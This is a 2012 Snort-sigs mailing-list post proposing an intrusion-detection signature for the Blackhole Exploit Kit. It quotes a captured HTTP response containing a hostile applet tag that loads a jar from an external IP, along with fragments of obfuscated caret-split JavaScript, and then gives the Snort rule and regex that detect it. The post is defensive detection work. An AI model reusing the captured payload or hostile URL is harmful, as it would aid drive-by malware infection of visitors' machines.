[Snort-sigs] Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet

Community Proposed lists at ...3397...
Tue Feb 21 14:16:17 EST 2012


12:08:49.734573 IP 65.75.137.95.80 > a.b.c.d.3586: . 1:1461(1460) ack 567 win
6792
HTTP/1.1 200 OK
Date: Tue, 21 Feb 2012 19:30:23 GMT
Server: nginx/0.7.65
Content-Type: text/html
X-Powered-By: PHP/5.3.2
Connection: close
Transfer-Encoding: chunked

4ef
<html><body><applet code='Photo.class'
archive='http://65.75.137.95/content/jav.jar'><param
value="vssMlgg=9Po9Pd%oP/9gOFU6gYPMvM-Vcd=G6cr" name="p"/></applet><div
style="display:none;"><p>@wpg9p@^p^@pg^p at ...3634...^4p4p^^p^2pg3p^4p at ...3320...635...@^p at ...3634...^4p at ...3636...^2p20pzwpg2p^p20p3wpggp at ...3636...@@p^3p at ...3637...^^p@@pg3p^4p-z0p^0p@@pgzp at ...3638...^3p-z0pggpg9p@@p at ...3639...@pg2p^p20pzwp at ...3640...@^p at ...3634...^4p at ...3636...^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^4pg3pg9pgwp-z0p at ...3634...@wp at ...3641...^2p at ...3636...@wpg3p^2p at ...3636...@^p^4p-2p-zpwzpw3p^gp@@p^2p-z0p^0p at ...3642...^gp at ...3636...^2pz9p49pgp2pgp2pgp2pgp at ...3643...@@p^3pg2p^gp at ...3636...^2pz9p49pgp2pgp2pgp2pgp at ...3644...^p^4p^2p^9pwzp^gp@@p^2p-z0p3wpggp^@pgzpg3pgwp2gp at ...3636...^4p at ...3636...@^p^4pz9pwzp^gp at ...3636...^2p^3pg3pg9pgwpzgp-wpgp4pz3p4pz2p-wp2pgwp@@pg^p at ...3645...^@pgzpg3pgwp2gp at ...3636...^4p at ...3636...@^p^4p-wp2pg2p@@pgwp at ...3646...@9p^2pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@^p2p at ...3647...@@p-zpwzp^2p at ...3636...^4p^@p^2pgwp-z0pg0p^@pgwp@^p^4pg3pg9pgwp-2p-zpwzp@^p-2p at ...202....3647...@@p-zpw3pw3p2pg3p^3p2gp at ...3648...@9p at ...3649...^@pgwp@^p^4pg3pg9pgwp-2p at ...3650...^2p at ...3636...^4p^@p^2pgwp-z0p^4p^9p^0p at ...3651...@gp-9pz9p-wp^@pgwp at ...3652...@9pg0pg3pgwp at ...3636...@wp-wpw3p2pg3p^3p23p^2p^2p@@p^9pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p at ...3650...^2p at ...3636...^4p^@p^2pgwp-2p
 @p@@p^2p^2p@@p^9p at ...3653...^4p at ...3636...^3p^4p-2p3^p at ...3654...@9p@^p^4p4p^0p^2pg9p^4pg9p^4p^9p^0p at ...3655...^4pg9
333

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY
SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with
hostile applet"; flow:established,from_server;
content:"<html><body><applet|20|"; fast_pattern; content:"|20|code=";
distance:0; content:"|20|archive="; distance:0; content:"|3a|none|3b|";
distance:0; nocase; pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi";
classtype:trojan-activity;
reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx;
sid:x; rev:1;)

Thanks,
Nathan





More information about the Snort-sigs mailing list